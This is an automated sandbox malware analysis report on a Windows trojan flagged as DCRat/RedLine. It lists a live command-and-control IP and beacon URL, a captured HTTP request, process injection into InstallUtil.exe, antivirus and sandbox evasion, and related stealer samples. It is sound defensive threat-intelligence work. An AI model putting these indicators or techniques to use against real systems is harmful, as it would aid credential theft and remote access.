Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: GetLocaleInfoW,	0_2_01342554
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: GetLocaleInfoW,	0_2_01342783
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0134267D
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_01341EEE

Source: C:\Users\user\Desktop\a9rLzLY498.exe

Code function: 0_2_0132A01C cpuid

0_2_0132A01C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\a9rLzLY498.exe

Code function: 0_2_0132A44F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_0132A44F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a9rLzLY498.exe.1356a70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a9rLzLY498.exe.1320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.254163988.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.253884261.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a9rLzLY498.exe PID: 6684, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6752, type: MEMORYSTR

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a9rLzLY498.exe.1356a70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a9rLzLY498.exe.1320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.254163988.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.253884261.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a9rLzLY498.exe PID: 6684, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6752, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	141 Windows Management Instrumentation	Path Interception	311 Process Injection	1 Masquerading	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	151 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	141 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	311 Process Injection	NTDS	141 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	112 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	21 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Software Packing	DCSync	55 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
a9rLzLY498.exe	100%	Avira	HEUR/AGEN.1317015
a9rLzLY498.exe	66%	ReversingLabs	Win32.Trojan.RedLine
a9rLzLY498.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/@uR2QlRXY2lmcwlGdsVXbsx2bwdmbvxWZtF2Z	0%	Virustotal		Browse
http://85.192.63.134	10%	Virustotal		Browse
http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/gamelongpollmultiprivateCdn.php?H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB&70c651d584b78b83a0db5e7ef0d2f3ac=9dc484284b526be3162c17278d370399&993462349e93aed7bfda6755d4d2dbec=QO3MTZiJWNiR2NhJWYkFTM2kTOwcTZwMGOmRzM4UTO4EDM0cjM0M2Y&H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB	100%	Avira URL Cloud	malware
http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyn	6%	Virustotal		Browse
http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyn	100%	Avira URL Cloud	malware
http://85.192.63.134	100%	Avira URL Cloud	malware
http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/@uR2QlRXY2lmcwlGdsVXbsx2bwdmbvxWZtF2Z	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/gamelongpollmultiprivateCdn.php?H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB&70c651d584b78b83a0db5e7ef0d2f3ac=9dc484284b526be3162c17278d370399&993462349e93aed7bfda6755d4d2dbec=QO3MTZiJWNiR2NhJWYkFTM2kTOwcTZwMGOmRzM4UTO4EDM0cjM0M2Y&H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB	true	Avira URL Cloud: malware	unknown
http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/@uR2QlRXY2lmcwlGdsVXbsx2bwdmbvxWZtF2Z	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://85.192.63.134	InstallUtil.exe, 00000003.00000002.254163988.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.254163988.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.254163988.0000000002C33000.00000004.00000800.00020000.00000000.sdmp	true	10%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	InstallUtil.exe, 00000003.00000002.254163988.0000000002C12000.00000004.00000800.00020000.00000000.sdmp	false		high
http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyn	InstallUtil.exe, 00000003.00000002.254163988.0000000002C12000.00000004.00000800.00020000.00000000.sdmp	true	6%, Virustotal, Browse Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
85.192.63.134	unknown	Russian Federation		47711	LINEGROUP-ASRU	true

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1311370
Start date and time:	2023-09-20 09:46:13 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	a9rLzLY498.exe
Original Sample Name:	5a09955b26de8ecdfd90121d3e208825.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/2@0/1
EGA Information:	Successful, ratio: 50%
HDC Information:	Failed
HCA Information:	Successful, ratio: 99% Number of executed functions: 111 Number of non-executed functions: 47
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, kv601.prod.do.dsp.mp.microsoft.com, geover.prod.do.dsp.mp.microsoft.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, arc.msn.com
Execution Graph export aborted for target InstallUtil.exe, PID 6752 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:47:20	API Interceptor	3x Sleep call for process: InstallUtil.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
85.192.63.134	MtgwNNkkgT.exe	Get hash	malicious	DCRat	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LINEGROUP-ASRU	MtgwNNkkgT.exe	Get hash	malicious	DCRat	Browse	85.192.63.134
	file.exe	Get hash	malicious	Unknown	Browse	85.192.63.194
	xGSkelSjdu.exe	Get hash	malicious	Raccoon Stealer v2	Browse	85.192.63.15
	ImBetter.exe	Get hash	malicious	Unknown	Browse	85.192.63.32
	B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll	Get hash	malicious	Raccoon Stealer v2	Browse	85.192.63.204
	B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll	Get hash	malicious	Raccoon Stealer v2	Browse	85.192.63.204
	DxIQxeHMa9.exe	Get hash	malicious	Amadey, Laplas Clipper	Browse	85.192.63.121
	Tn4ashLbYc.exe	Get hash	malicious	Aurora	Browse	85.192.63.77
	BkazCbNYxo.exe	Get hash	malicious	Aurora, AgentTesla, Amadey, Eternity Stealer	Browse	85.192.63.77
	oOb5C7arAh.dll	Get hash	malicious	Amadey, Raccoon Stealer v2, RedLine	Browse	85.192.63.204
	c96cf2857a6044e9149ab0d55c3dfe280cefe8add4791.dll	Get hash	malicious	Amadey, Raccoon Stealer v2, RedLine	Browse	85.192.63.121
	59d84ed47893f3f3b3a3e121ffbcfa0b86bdb91431a7c.exe	Get hash	malicious	Amadey	Browse	85.192.63.121
	evb.exe	Get hash	malicious	Unknown	Browse	85.192.63.103
	file.exe	Get hash	malicious	RedLine	Browse	85.192.63.57
	yW7mLzcc7I.exe	Get hash	malicious	Unknown	Browse	85.192.63.240
	zaebr2KFu1.exe	Get hash	malicious	Unknown	Browse	85.192.63.240
	6UehABuMnu.exe	Get hash	malicious	Unknown	Browse	85.192.63.240
	N3gA1d2efb.exe	Get hash	malicious	Eternity Stealer	Browse	85.192.63.240
	ZdxTUeilBE.exe	Get hash	malicious	Unknown	Browse	85.192.63.240
	41y5zVipKH.exe	Get hash	malicious	Unknown	Browse	85.192.63.240

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1298
Entropy (8bit):	5.325943738887083
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KI2KDE4KhKYIqDcfJKhPKIE4oKzeEKoZAE4KzQKfJE4VE4G1qE4FsXD:MIHK5HKI2YHKhBUoPtHoBEhAHKz9fJHW
MD5:	B22140F614C0DF020F2F2EF28263CBA8
SHA1:	F9CB2646E6F4BE3834D8D702DB41386D082E266C
SHA-256:	30A905A788AB1E157F9C265669503FDE317B8504689EC765F8FE83436FFA55BA
SHA-512:	2871E73F72EF3D6F8BAAFAD58DD83C9074F3465A9F55658718D41E9BD5993D33260511364D58F6C628FE01B98E68C8423A0AB86EB1E435AC132D6AF0F06538F7
Malicious:	false
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\2bef38851483abae82f1172c1aaa604c\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\9d04ce1d8a3042f50b54c7f9ccdb4068\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8c730c7fbe608461407cf3be279cdeab\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2e14a1befe55e7d9ad2457ceb5267e36\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, Publ

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\a9rLzLY498.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	35
Entropy (8bit):	3.8134616510875294
Encrypted:	false
SSDEEP:	3:liMGKXfuHu7v:liMGeuHyv
MD5:	C27BE8FCA72C6433A97D94021F490CDD
SHA1:	D596AAAE4100521E6C842EAD304C903DE908C3F4
SHA-256:	A42BBD1C477873FAD13F6C97E0CD68164A5C5026ACDEC952DCC1E092E97A51F6
SHA-512:	78D16ED2C7CEB43839061F373FB315F32DBED9D77DDC9DB37162D944A16B45E317EDD83726B32C431B1F05FFF9C0E8FFC8363BF5B56958EC08A773762273E957
Malicious:	false
Reputation:	low
Preview:	Sorted vector: 1 2 3 4 5 6 7 8 9 ..

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	5.671462678637105
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	a9rLzLY498.exe
File size:	2'114'048 bytes
MD5:	5a09955b26de8ecdfd90121d3e208825
SHA1:	f9ba5c15dca18cbbcac885c3d31b54b4416ff06f
SHA256:	9a813ede666b2e709555af5fd3da93ee77a30a1f615c2036e9161932482bf022
SHA512:	043ead1331d96896638a7fb69dd6813c3d807255284cbb87b05e32e83c132e52ac95cdf84ced59af90230bb89c6637fa7f6232730588d93fc7bd39e51e929ba7
SSDEEP:	24576:+af/AXatCkb39Dhd0FhOKx/sO/PPpcEbIYPxvYz3zkdpliAzT4t8NO5vH:PAXcCY3bdeOK1pHpcEUYWzodpFsiNWH
TLSH:	BCA5124278E1C4B1E4B2123209E0DBBA1A7F79340BA59DEF17D01B6E8F217D1C67166B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........._Z...Z...Z.......W...............L.......K.......O......._...Z...................[.......[...RichZ...........PE..L.....Sd...

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x409cc2
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6453F212 [Thu May 4 17:57:38 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	f13181778fde385e01ef306b3e3c20ba

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
call 00007F60088E87CAh
jmp 00007F60088E7E69h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F60088E800Bh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F60088E7FFCh
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F60088E7FFEh
add edx, 28h
cmp edx, esi
jne 00007F60088E7FDCh
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F60088E7FEBh
push esi
call 00007F60088E8AA4h
test eax, eax
je 00007F60088E8012h
mov eax, dword ptr fs:[00000018h]
mov esi, 0053A5D0h
mov edx, dword ptr [eax+04h]
jmp 00007F60088E7FF6h
cmp edx, eax
je 00007F60088E8002h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F60088E7FE2h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007F60088E7FF9h
mov byte ptr [0053A5D4h], 00000001h
call 00007F60088E82BAh
call 00007F60088EB037h
test al, al
jne 00007F60088E7FF6h
xor al, al
pop ebp
ret
call 00007F60088F4D78h
test al, al
jne 00007F60088E7FFCh
push 00000000h
call 00007F60088EB03Eh
pop ecx
jmp 00007F60088E7FDBh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [0053A5D5h], 00000000h
je 00007F60088E7FF6h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x356f8	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x400	0x300
IMAGE_DIRECTORY_ENTRY_SECURITY	0x600	0x100
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x13c000	0x1e2c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x338d0	0x0	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x33810	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x28000	0x13c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x26b80	0x26c00	False	0.5682585685483871	data	6.667171746059635	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x28000	0xde20	0xe000	False	0.5119803292410714	data	5.488575071928691	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x36000	0x1050f0	0x104400	False	0.9969699357588857	DOS executable (block device driver \377\377\377\377N)	7.998793152267472	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x13c000	0x1e2c	0x2000	False	0.7174072265625	data	6.402635845254397	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.Sakut	0x13e000	0xc8af0	0xc8c00	False	0.0010677731942714819	OpenPGP Secret Key	0.0008440436192122338	IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

USER32.dll

DdeQueryNextServer

KERNEL32.dll

LoadLibraryExW, CreateFileW, FreeConsole, GetModuleHandleW, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, HeapSize, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, WriteConsoleW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap

Network Behavior

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 20, 2023 09:47:20.434411049 CEST	49706	80	192.168.2.6	85.192.63.134
Sep 20, 2023 09:47:20.687223911 CEST	80	49706	85.192.63.134	192.168.2.6
Sep 20, 2023 09:47:20.687344074 CEST	49706	80	192.168.2.6	85.192.63.134
Sep 20, 2023 09:47:20.692095041 CEST	49706	80	192.168.2.6	85.192.63.134
Sep 20, 2023 09:47:20.941962957 CEST	80	49706	85.192.63.134	192.168.2.6
Sep 20, 2023 09:47:20.942027092 CEST	80	49706	85.192.63.134	192.168.2.6
Sep 20, 2023 09:47:20.993397951 CEST	49706	80	192.168.2.6	85.192.63.134
Sep 20, 2023 09:47:21.021341085 CEST	49706	80	192.168.2.6	85.192.63.134
Sep 20, 2023 09:47:21.275055885 CEST	80	49706	85.192.63.134	192.168.2.6
Sep 20, 2023 09:47:21.318645954 CEST	49706	80	192.168.2.6	85.192.63.134

HTTP Request Dependency Graph

85.192.63.134

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49706	85.192.63.134	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	kBytes transferred	Direction	Data
Sep 20, 2023 09:47:20.692095041 CEST	184	OUT	GET /voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/gamelongpollmultiprivateCdn.php?H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB&70c651d584b78b83a0db5e7ef0d2f3ac=9dc484284b526be3162c17278d370399&993462349e93aed7bfda6755d4d2dbec=QO3MTZiJWNiR2NhJWYkFTM2kTOwcTZwMGOmRzM4UTO4EDM0cjM0M2Y&H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 85.192.63.134 Connection: Keep-Alive
Sep 20, 2023 09:47:20.942027092 CEST	184	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Sep 2023 07:47:20 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
